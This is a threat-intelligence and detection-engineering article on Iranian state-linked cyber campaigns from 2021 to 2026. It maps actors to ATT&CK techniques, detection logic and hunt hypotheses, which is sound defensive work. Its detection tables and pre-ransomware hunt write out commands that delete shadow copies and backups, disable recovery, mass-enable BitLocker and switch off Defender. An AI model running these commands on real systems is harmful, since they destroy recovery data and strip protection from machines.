Executive Summary
As of March 2, 2026, the United States, Israel, and Iran are operating in an active multi-domain conflict environment. Cyber operations are not parallel to kinetic events — they are integrated components of escalation management, deterrence signaling, and retaliation.
However, effective defense in 2026 requires understanding how Iranian cyber tradecraft evolved from 2021 onward, not just reacting to current headlines.
The most important defensive insight:
The techniques used in 2026 were built incrementally through campaigns executed between 2021 and 2025.
This article analyzes that progression and translates it into concrete detection and defensive strategy guidance.
Detection & Strategy DisclaimerThe thresholds and detection logic in this document are illustrative, not prescriptive.Values such as replay windows (e.g., 10–15 minutes), exfil size limits, burst timing, or file modification rates must be tuned to your environment.Network design, workforce geography, cloud setup, logging depth, OT/IT segmentation, and normal user behavior all affect what is “anomalous.”There is no universal threshold — only environment-calibrated detection.
Geopolitical Context: Why It Matters to Defenders
Iran’s cyber operations are not calendar-driven — they are event-triggered.
Kinetic escalation reliably predicts cyber escalation. If missiles move, packets follow.
Understanding the conflict timeline helps you anticipate when to raise monitoring thresholds, shorten patch SLAs, and shift into escalation posture.
Strategic Shift
With conventional assets degraded and IRGC leadership losses, asymmetric retaliation gets intensified — cyber becomes the primary scalable response mechanism.
Operational Implication for SOC & Threat Hunters
Geopolitical events are not background noise. They are early-warning indicators for cyber posture adjustment.
When escalation occurs:
Expect attack volume increase within 72–96 hours
Shorten edge patch timelines immediately
Elevate monitoring on VPN, identity, and OT systems
Treat DDoS waves as potential masking for intrusion
Part I — Strategic Pattern (2021 → 2025)
Iranian cyber operations from 2021–2026 show four consistent characteristics:
Operational aggression paired with asymmetric pragmatism
Blended espionage + disruption within the same intrusion
Preference for legitimate tooling and low-noise tradecraft
Escalation-driven tempo spikes
The tactical stack evolved, but the doctrine remained consistent:
Gain access
Extract intelligence
Preserve access
Escalate impact when geopolitically useful
Understanding the evolution of those steps is critical.
What Changed in Iran’s Cyber Operations Post–June 2025
1. Hacktivist–State Blurring Became Operational Reality
The line between IRGC cyber units and “independent” hacktivists effectively disappeared.
Analysis of 250,000+ Telegram messages across 178+ groups showed:
Shared target lists
Live vulnerability exchange
Attack timing aligned with military developments
This was not organic activism — it was coordinated orchestration.
Key proxy clusters activated:
Fatimion Cyber Team — DDoS against Israeli government portals
Cyber Fattah — Data theft and defacement (logistics, healthcare)
Cyber Islamic Resistance — Critical infrastructure reconnaissance
Cotton Sandstorm (Emennet Pasargad) — Influence ops + hack-and-leak
Defensive takeaway: Treat “hacktivist” activity during escalation as potential state-aligned reconnaissance or masking noise — not just nuisance DDoS.
2. Pioneer Kitten Formalized the Initial Access Broker Model
Pioneer Kitten (Fox Kitten / Lemon Sandstorm) expanded from VPN exploitation into structured initial access brokerage.
Compromised enterprise access was sold to ransomware groups (e.g., NoEscape, ALPHV/BlackCat), allowing Iran-linked operators to:
Monetize espionage footholds
Maintain plausible deniability
Offload destructive payloads to criminal actors
Detection implication: A VPN exploit followed by quiet lateral movement may later surface as “commodity ransomware.” The IAB layer obscures nation-state fingerprints at impact.
3. Cyber as ISR: Agrius Camera Exploitation
Post-strike activity revealed Agrius scanning and accessing internet-connected cameras to assess physical damage.
This marked a doctrinal shift: Cyber access used as real-time ISR (intelligence, surveillance, reconnaissance) supporting kinetic awareness.
Detection implication: Unexpected outbound traffic from CCTV/NVR systems to foreign IP space should be investigated as potential reconnaissance — not dismissed as benign telemetry.
4. GenAI-Enhanced Phishing at Scale
APT42 (Agent Serpens / Charming Kitten) began deploying AI-generated malicious documents impersonating credible institutions (e.g., RAND).
Impact:
Fluent, context-aware English
Accurate references to target research
Realistic document formatting
The traditional phishing red flag — poor grammar — is obsolete.
Defensive takeaway: Detection must rely on behavioral signals (token replay, device mismatch, anomalous OAuth activity), not content quality.
5. Operational Tempo Accelerated
Israeli National Cyber Directorate alerts:
2023: 367
2024: 736 (518 high-confidence “red alerts”)
2025: On track to exceed 2024
The year-over-year doubling reflects not just better detection — but genuine escalation in operational volume and aggressiveness.
Strategic implication: Cyber tempo now tracks geopolitical escalation within 72–96 hours. SOC posture must adapt accordingly.
Current Target Prioritization (Post-June 2025)
Iran's targeting has expanded well beyond Israeli infrastructure in the escalation environment:
Priority Tier | Target Category | Rationale |
Tier 1 | Israeli government, defense, aerospace, energy | Direct retaliation targets |
Tier 1 | US military and defense contractors | Retaliation for US strikes on nuclear facilities |
Tier 2 | US critical infrastructure (water, energy, healthcare, IT) | Strategic deterrence positioning; Unitronics precedent |
Tier 2 | Gulf states (UAE, Saudi Arabia, Bahrain) | Regional adversaries/normalized with Israel |
Tier 3 | Western European governments with ties to strike coalition | Broader pressure campaign |
Tier 3 | Jewish diaspora organizations and institutions globally | Psychological and data operations |
Detection Posture Adjustment for the Escalation Environment
The following threat hunt priorities should be elevated immediately for any organization in Tier 1 or Tier 2:
VPN/edge device exploitation monitoring — Pioneer Kitten specializes in N-day VPN exploits. Any unpatched Fortinet, Pulse Secure, Cisco SSL-VPN in your environment is an active target.
OT/ICS internet exposure audit — Run Shodan scan against your own IP ranges for OT protocol banners (ports 102, 502, 20256, 2404, 44818) immediately. Remove any exposure found.
MFA fatigue / push bombing detection — Elevated tempo means increased MFA spam attacks. Monitor for >3 MFA push notifications to a single user within 5 minutes from foreign IP.
Agrius-style camera scanning — If your organization operates network-connected cameras, check for unexpected outbound connections from camera management systems or NVRs to non-update-service external IPs.
AI-generated phishing awareness — Brief security teams and high-value targets (executives, researchers, policy staff): AI-generated phishing from Iran now reads fluently and references real, relevant content. Grammar quality is no longer a reliable indicator of malicious email.
Ransomware IAB access sale awareness — If you detect a Pioneer Kitten-style VPN intrusion (N-day exploit, living off the land, no immediate ransomware), treat it as a ransomware precursor. The intrusion may be sold to a criminal ransomware group within days of access validation.
Threat Actor Landscape
Common Name | Alt Name | Linked To | Primary Mission | Primary Targets |
Charming Kitten | TA453, APT42, PHOSPHORUS | IRGC (MOIS intelligence) | Influence ops, credential theft | Journalists, researchers, dissidents, nuclear policy |
MuddyWater | MERCURY, TA450 | MOIS (Ministry of Intel) | Espionage, ransomware pivot | Government, telecom, energy, defense |
APT34 / OilRig | Hazel Sandstorm | MOIS | Deep persistent espionage | Government, oil/gas, aviation, finance (Middle East) |
APT33 | Refined Kitten | IRGC | Destructive + espionage | Aerospace, energy, defense |
CyberAv3ngers | — | IRGC Cyber Command | Cyber-kinetic, OT disruption | Israeli infra, water/energy, US utilities |
Handala | — | IRGC/MOIS (assessed) | Destructive wiper, psyops | Israel, Gulf states |
Agrius | — | MOIS | Destructive wiper under ransomware cover | Israel, Gulf states, Iran dissidents |
Screening Serpens | — | MOIS | Masquerade as Israeli company, data theft | Iranian dissidents, dual nationals |
Key distinction: Iran operates multiple distinct cyber units across IRGC (Islamic Revolutionary Guard Corps) and MOIS (Ministry of Intelligence), with different mandates:
IRGC units: More aggressive, willing to conduct destructive and kinetically-integrated operations
MOIS units: More patient, focused on espionage, influence operations, targeting regime critics
Part II — Campaign Evolution Analysis (2021–2025)
2021–2022: Espionage-First with Occasional Disruption
Characteristic: Traditional spear-phishing for espionage; occasional OT targeting; beginning of credential harvesting at scale
Tooling: Custom RATs (PowerShell Empire, custom VBS/PS droppers), Mimikatz, web shells
Detection profile: MEDIUM — tooling has signatures, behavior is detectable with good EDR
2022–2023: MFA Bypass and Credential Industrialization
Characteristic: Mass-scale AiTM phishing (EvilGinx2) for credential/session token theft; ISP-level DNS hijacking for government targets
Tooling: EvilGinx2, custom phishing frameworks, ISP-level DNS manipulation
Detection profile: LOW for EvilGinx2 (bypasses MFA, appears as legitimate auth); VERY LOW for ISP DNS hijack
Defining campaign: TA453 EvilGinx2 global credential harvesting
2023–2025: Cyber-Kinetic Escalation (Gaza Conflict Era)
Characteristic: Gaza conflict triggered unprecedented tempo; OT targeting (Unitronics, water/energy); wiper + psyops (Handala); ransomware pivot normalized
Tooling: BitLocker-based ransomware, custom wipers, OT-specific tooling, EvilGinx2 continued at scale
Detection profile: VARIED — OT attacks are simple but effective; ransomware pivot is detectable in pre-deployment phase
Defining campaigns: Unitronics/US water utilities, Handala wiper ops, CyberAv3ngers Israeli infra
2025–2026: Persistent Access Programs + AI-Assisted Phishing
Characteristic: Development of long-duration persistent access (shifting from hit-and-run to dwell); AI-generated spear-phishing content personalized at scale
Emerging: AI-assisted phishing dramatically reduces production time for high-quality personalized spear-phish; AI voice cloning used in some social engineering calls
Unique threat: Iran's combination of espionage + ransomware + psyops in single operations with escalating OT capability
Part III — Full Kill Chain: Phase-by-Phase TTPs with Detection Logic
Phase 1 – Reconnaissance
Phase | TTP | MITRE ID | Derived From | Detection / Controls |
Recon | Social Media Profiling of Targets | T1591.001 | Charming Kitten profiling via Twitter, LinkedIn, academic publications, conference attendance before crafting personalized lures | Detection limited for OSINT. Compensating control: reduce professional information exposure. Employees should not publicly disclose research focus, org structure, or security tooling. |
Recon | Scanning for Exposed OT/ICS Systems | T1595.001 | CyberAv3ngers / IRGC Shodan-based discovery of internet-exposed Unitronics PLCs | Regular internet exposure scans (Shodan, Censys).2. Any OT device internet-visible = emergency remediation.3. Audit all WAN-facing IPs due to IT/OT convergence risk. |
Phase 2 – Initial Access
Phase | TTP | MITRE ID | Derived From | Detection Logic |
Initial Access | Phishing with Malicious Links / AiTM Proxy | T1566.002 + T1539 | Charming Kitten EvilGinx2 campaigns | Email Gateway: Newly registered domain (<30 days), not in top 1M, domain spoofing major provider, Let’s Encrypt cert → sandbox before delivery.DNS/Proxy: Domain similar to Microsoft/Google + TTL < 60 seconds. |
Initial Access | Exploit Public-Facing Application (VPN/Remote Access) | T1190 | MuddyWater VPN exploitation (Fortinet, Pulse, Check Point) | VPN Logs: Auth failure → success from same IP within 60 min.Management API accessed externally.POST to authenticated endpoint without valid session. |
Key CVEs Exploited (2021–2025):
CVE-2022-42475
CVE-2024-21762
CVE-2021-22893
CVE-2019-11510
Phase 3 – Execution & Persistence
Phase | TTP | MITRE ID | Derived From | Detection Logic |
Execution | PowerShell-Based Dropper | T1059.001 | MuddyWater POWERSTATS | Sysmon 1: EncodedCommand, Office → PowerShell spawn, outbound HTTP/HTTPS not matching approved infra.PS 4104: Invoke-RestMethod / Invoke-WebRequest to non-approved domain + persistence via scheduled task/startup. |
Persistence | Web Shell Deployment | T1505.003 | APT34/OilRig web shells (HYPERSHELL, TWOFACE) | Sysmon 11: w3wp/httpd creates .aspx/.php/.jsp in web root.Web Logs: Suspicious POST to web shell path, abnormal/empty User-Agent, IP outside admin range. |
Phase 4 – Privilege Escalation & Defense Evasion
Phase | TTP | MITRE ID | Derived From | Detection Logic |
Priv Esc | Kernel Exploits | T1068 | MuddyWater / APT34 LPE usage | Sysmon 1 + WinSec: User process spawning SYSTEM process without UAC (no 4703).WinSec 4673: SeDebugPrivilege / SeBackupPrivilege granted unexpectedly. |
Defense Evasion | Disable Security Tools | T1562.001 | MuddyWater Defender tampering | WinSec 4719 + Sysmon 13: DisableAntiSpyware registry key change, AV exclusions added, service stop targeting AV.PS 4104: Set-MpPreference -DisableRealtimeMonitoring or Add-MpPreference -ExclusionPath. |
Phase 5 – Credential Access
Phase | TTP | MITRE ID | Derived From | Detection Logic |
Credential Access | AiTM Session Cookie Theft | T1557 | Charming Kitten EvilGinx2 | Entra ID Logs: MFA success + same session token used from geo-distinct IP within 10 min.Browser Telemetry: Unexpected certificate issuer for Microsoft/Google domain. |
Credential Access | LSASS Dumping | T1003.001 | MuddyWater / APT34 | Sysmon 10: TargetImage=lsass.exe, GrantedAccess 0x1010 or 0x1fffff, SourceImage not EDR-whitelisted. |
Phase 6 – Lateral Movement
Phase | TTP | MITRE ID | Derived From | Detection Logic |
Lateral Movement | SMB/WMI Remote Execution | T1021.002 / T1021.003 | MuddyWater PsExec-style movement | WinSec 4624 + 4648: Logon Type 3 NTLM from workstation → server using LSASS-harvested creds.Sysmon 1: services.exe spawning unexpected child process. |
Lateral Movement | Valid Accounts via Stolen Web Credentials | T1078.003 | APT34 DNS hijack / web credential theft | Successful login from never-before-seen IP + unusual country + no prior MFA event. |
Phase 7 – Collection & Exfiltration
Phase | TTP | MITRE ID | Derived From | Detection Logic |
Collection | Email Export + Archive | T1114.002 + T1560.001 | APT34 mail export pattern | Exchange Audit: New-MailboxExportRequest by non-admin.Sysmon 1/File: PST in non-standard path + archive in Temp/Public + immediate outbound transfer. |
Exfiltration | Cloud Upload | T1567 | APT34 / MuddyWater | DLP/Proxy: Upload >500MB to MEGA/pCloud/unknown cloud or previously unseen external destination. |
Phase 8 – OT/ICS Targeting
Layer | Focus | Detection Logic |
Layer 1 | Network Visibility | Passive OT monitoring (Claroty/Dragos/Nozomi). Any ICS protocol from IT network to OT = immediate alert. |
Layer 2 | Setpoint Monitoring | Setpoint changes outside baseline or business hours or from non-HMI workstation. |
Layer 3 | Remote Access | Direct internet → OT connection OR VPN user accessing OT directly OR ICS protocol traffic on IT segments. |
Why IT tools miss OT:
PLCs use RTOS (no EDR)
Legacy auth weak/default
ICS protocols not inspected by firewalls
Incomplete asset inventory
Phase 9 – Impact
Phase | TTP | MITRE ID | Derived From | Detection Logic |
Impact | BitLocker Ransomware Pivot | T1486 | MuddyWater / Agrius | Pre-Ransom Indicators:Day 1–7: vssadmin list shadows, net view /all, AD enumeration.Day 7–14: vssadmin delete shadows /all, wbadmin delete backup, bcdedit recovery disable.Day 14–21: manage-bde -on mass execution.Alert: ANY vssadmin delete shadows = high severity. |
Impact | Defacement / PsyOps | T1491.001 | Handala / CyberAv3ngers | WAF/FIM: index.html/index.php modified outside CMS pipeline OR homepage hash change. Immediate visibility impact. |
Detection Engineering Master Matrix
Phase | TTP | MITRE ID | Log Source | Key Event ID / Indicator | Actor |
Initial Access | AiTM phishing (EvilGinx2) | T1566.002 | Proxy / Email GW | Link to newly-registered domain similar to major service | Charming Kitten |
Initial Access | VPN exploit | T1190 | VPN/Edge logs | Auth bypass or management access from external IP | MuddyWater |
Initial Access | OT/ICS default credentials | T1078 | OT system logs | Auth to Unitronics/PLC from non-engineering IP | CyberAv3ngers |
Execution | PowerShell dropper | T1059.001 | Sysmon 1 + PS 4104 | Office app spawns PS with encoded command | MuddyWater |
Persistence | Web shell | T1505.003 | Sysmon 11 | w3wp.exe creates .aspx in web root | APT34 |
Credential Access | EvilGinx2 session token theft | T1539 | Entra ID Sign-in | Post-auth session replay from different geo | Charming Kitten |
Credential Access | LSASS dump | T1003.001 | Sysmon 10 | lsass.exe access GrantedAccess 0x1fffff | MuddyWater, APT34 |
Defense Evasion | Disable Windows Defender | T1562.001 | Sysmon 13 | Registry key DisableAntiSpyware set | MuddyWater |
Defense Evasion | BitLocker abuse | T1486 | Sysmon 1 | manage-bde.exe -on from non-admin account | MuddyWater, Agrius |
Lateral Movement | SMB/WMI remote execution | T1021.002 | WinSec 4624 | NTLM Type 3 logon from workstation to server | All Iran |
Collection | Mail export + archive | T1114.002 | Exchange audit | New-MailboxExportRequest + 7zip/WinRAR activity | APT34 |
Collection | DNS hijack via ISP | T1557 | CT log monitoring | Unexpected certificate issued for org domain | APT34 |
Exfiltration | Upload to cloud storage | T1567 | DLP/Proxy | Large upload to MEGA/cloud from internal host | APT34, MuddyWater |
Pre-Impact | VSS deletion | T1490 | Sysmon 1 | vssadmin delete shadows /all | MuddyWater, Agrius |
Impact | BitLocker ransomware | T1486 | Sysmon 1 | manage-bde.exe mass deployment | MuddyWater, Agrius |
Impact | Wiper deployment | T1485 | Sysmon 11 | Mass file deletion + MBR write | Handala, Agrius |
Impact | OT setpoint manipulation | T0855 | OT passive capture | ICS command from non-HMI source | CyberAv3ngers |
Psyops | Defacement | T1491.001 | FIM / WAF | Web content modified outside deployment process | Handala |
Part IV — Threat Hunt Hypotheses
These hunts complement EDR/ITDR alerting. Mature platforms may detect portions or most of this activity, but correlation, tuning, and escalation logic determine whether intrusion is caught pre-impact or post-encryption
Hunt 1: EvilGinx2 — Session Token Replay
Hypothesis: AiTM proxy captured a session token and replayed it from a different IP/device.
Note: Mature ITDR platforms often alert on impossible travel or token anomalies — validate coverage before building custom logic.
Core Detection Logic:
MFA-complete sign-in → record session token + IP
Same session token used within short window (env-tuned) from different IP
Geo-inconsistent access OR device/user-agent mismatch
No corresponding MFA re-challenge
High Confidence:
Same session ID + geo inconsistency
Session ID + changed user-agent/device fingerprint
Hunt 2: Pre-Ransom Staging (MuddyWater / Agrius)
Hypothesis: Actor is transitioning from espionage to destructive phase.
Core Detection Stack (correlate within 48h window, tune per environment):
vssadmin delete shadows
bcdedit /set recoveryenabled No
wbadmin delete
manage-bde -on (outside policy)
Escalation Logic:
1 indicator → HIGH
2+ indicators on same host → CRITICAL
manage-bde -on on server without GPO → immediate containment
Many EDR tools detect shadow copy deletion — correlation is the differentiator.
Hunt 3: POWERSTATS — Persistent PowerShell C2
Hypothesis: PowerShell implant beaconing at steady interval.
Detection Pattern:
powershell.exe → external HTTP(S)
1–10 connections/hour sustained
Same destination over hours/days
Non-interactive context (SYSTEM/service account)
Correlate with:
Scheduled task creation (4698)
Run key modification (Sysmon 13)
High confidence when:
Regular interval beacon + SYSTEM context
Hunt 4: APT34 Mail Export + Staging
Hypothesis: Admin-equivalent account exporting mailboxes for exfiltration.
Primary Indicator:
New-MailboxExportRequest by non-standard admin account
Correlate with:
PST in non-Outlook path
Archive creation (.zip/.7z/.rar)
Large outbound upload to non-approved cloud
CRITICAL: Mailbox export from unauthorized account — escalate immediately.
Hunt 5: Internet-Exposed OT Assets
Hypothesis: ICS device exposed externally (Unitronics-style risk).
Procedure:
Enumerate all public IP ranges
Cross-reference Shodan/Censys
Identify ICS protocol banners
Any exposed PLC/ICS port = CRITICAL.
This is prevention, not detection. Close exposure immediately.
Hunt 6: Wiper Pre-Staging / Active Execution
Hypothesis: Destructive payload staged or executing.
Pre-Staging Signals:
Unsigned executable in Windows root/ProgramData/temp
Combined with VSS deletion activity
Active Execution Signals:
Write to \\.\PhysicalDrive0
500 file delete/overwrite events in short burst (tune threshold)
CRITICAL: Raw disk write by unexpected process — isolate host immediately (no reboot).
Part V — Leadership Briefing: Strategic Threat Posture
The Strategic Reality
Iran's cyber threat is fundamentally different from China (patient, intelligence-focused) and Russia (intelligence + wartime kinetics). Iran operates as a reactive, escalatory actor: cyber operations surge in response to geopolitical events (assassinations, sanctions announcements, military strikes), then normalize, then surge again.
The key insight: you don't just monitor Iran threat actors — you monitor the geopolitical context. When Iran-Israel tensions spike, Iran-linked cyber operations against Israeli-adjacent organizations (companies doing business in Israel, companies perceived as pro-Israel, US defense organizations) spike in parallel.
Three Things Leadership Must Understand
1. If you have OT/ICS infrastructure, Iran will try to reach it — and the attack doesn't require sophistication.
The Aliquippa, PA water utility attack required: internet-accessible PLC + default password. That's all. You don't need to have a nation-state-sophisticated security posture to prevent this attack — you just need to ensure your OT devices are not directly internet-accessible. The most impactful defensive investment for organizations with OT infrastructure is OT network segmentation and asset inventory, not advanced threat detection.
Investment priority: OT/IT network segmentation audit, internet exposure scanning of all IP ranges for OT protocol banners, and mandatory credential hygiene for all OT devices.
2. MFA alone is not sufficient against Iran's credential theft operations.
Charming Kitten's EvilGinx2 infrastructure defeated MFA for thousands of targets. Any organization with high-value intelligence targets (government, think tanks, policy organizations, journalists) should assume that standard MFA (TOTP apps, SMS) can be defeated by determined Iran operators.
Investment priority: Device-bound authentication (FIDO2 hardware keys or device-certificate-based Conditional Access) — these cannot be stolen via AiTM proxy because the credential is cryptographically bound to the physical device. Phishing-resistant MFA is the specific standard needed.
3. The 14–21 day ransomware pivot means your EDR detection window is measured in weeks, not hours.
Iran's most common ransomware deployment pattern involves 2–3 weeks of espionage before pivoting to ransom. This means an organization that detects and evicts an Iranian intrusion quickly (within days of initial access) prevents the ransomware entirely. The same organization that detects at week 4 has both lost the intelligence AND faces a ransomware incident.
Investment priority: Mean Time to Detection (MTTD) improvement — specifically, detection of the early-stage indicators (PowerShell-based C2, web shell activity, privilege escalation attempts) within 72 hours of initial compromise, not 2-3 weeks.
Risk Prioritization by Actor
Actor | Likelihood | Impact | Your Asset at Risk |
MuddyWater | HIGH (broad targeting) | HIGH | Email, internal documents, potential ransomware |
Charming Kitten | MEDIUM–HIGH (targeted: researchers, gov, media) | HIGH | Email communications, credentials, personal safety risk for individuals |
APT34 / OilRig | MEDIUM (gov, energy, finance focus) | HIGH | Strategic communications, OT/ICS data |
CyberAv3ngers | HIGH (if OT/water/energy) | HIGH | OT process disruption, public-facing defacement |
Handala | LOW–MEDIUM (Israel/Gulf-adjacent) | HIGH | Data destruction, public reputation damage |
Agrius | MEDIUM (Israel-adjacent industry) | CRITICAL | Full data destruction via wiper + ransom cover |
This document reflects threat intelligence till February 2026. Iran's operational tempo is tightly coupled to geopolitical events. When reviewing this document's currency, always check current Iran-Israel and Iran-US geopolitical status — heightened tensions directly predict heightened cyber operations within 72–96 hours.
Master References Index
Government & Regulatory Advisories
Identifier | Title | Publisher | Year |
IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including US Water and Wastewater | CISA / FBI / NSA / EPA | December 2023 | |
Iranian Government-Sponsored MuddyWater Actors Conduct Cyber Operations Against Global Government and Commercial Networks | CISA | February 2022 | |
Iranian Cyber Actors Brute Force and Credential Access Activity Compromises Critical Infrastructure Organizations | FBI / CISA / DC3 | August 2024 | |
Unitronics Vision Series PLC Vulnerabilities | CISA ICS-CERT | December 2023 | |
National Terrorism Advisory System Bulletin — Elevated Iran Cyber Threat | DHS | June 2025 |
Annual Threat Intelligence Reports
Report Title | Publisher | Year |
Crowdstrike | 2026 | |
PaloAlto Networks - Unit42 | 2026 | |
Checkpoint | 2026 |
Vendor Threat Intelligence Reports
Actor / Campaign | Report Title | Publisher | Year |
CyberAv3ngers | MITRE ATT&CK | Ongoing | |
APT34 / OilRig | "Witchetty: Group Uses Updated Toolset in Attacks on Governments in Middle East" | Symantec | 2022 |
APT34 / OilRig | MITRE ATT&CK | Ongoing | |
Charming Kitten | "Mint Sandstorm Refines Tradecraft to Attack High-Value Targets" | Microsoft MSTIC | 2023 |
Charming Kitten | MITRE ATT&CK | Ongoing | |
MuddyWater | HHS HC3 | 2022 | |
MuddyWater | MITRE ATT&CK | Ongoing | |
Agrius | MITRE ATT&CK | Ongoing |
OT/ICS-Specific References
Title | Publisher | Year |
Dragos | 2026 | |
"Improving Cybersecurity in the Water and Wastewater Systems Sector" | EPA / CISA / FBI | 2024 |
WaterISAC | 2023–2024 |
